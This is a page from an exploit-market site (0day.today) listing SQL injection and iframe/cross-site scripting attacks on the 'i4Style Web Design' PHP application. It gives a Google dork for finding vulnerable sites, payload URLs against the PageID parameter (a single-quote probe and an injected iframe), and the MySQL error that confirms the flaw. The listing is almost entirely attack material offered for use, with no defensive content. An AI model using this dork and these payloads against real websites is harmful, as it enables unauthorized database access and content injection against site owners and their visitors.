[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

i4Style Web Design SQL Injection / Cross Site Scripting

Author
AngelParrot
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17274
Category
web applications
Date add
14-12-2011
Platform
php
################################################################

[+] Title : i4Style web design SQL Injection / IFrame Injection
[+] Author : AngelParrot
[+] Vendor : http://i4style.com/
[+] Google Dork : inurl:webpage.php?PageID= "i4Style"

################################################################

[+] Exploit

 - http://example.com/webpage.php?PageID=[SQL]
 - http://example.com/webpage.php?PageID=[IFrame]

[+] Example

 - http://example.com/webpage.php?PageID=1'
 - http://example.com/webpage.php?PageID=<iframe src="http://google.com"></iframe>

[+] Error Message

 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version
   for the right syntax to use near '\' ORDER BY t.PageID, t2.ParaNo' at line 1

 End



#  0day.today [2024-12-25]  #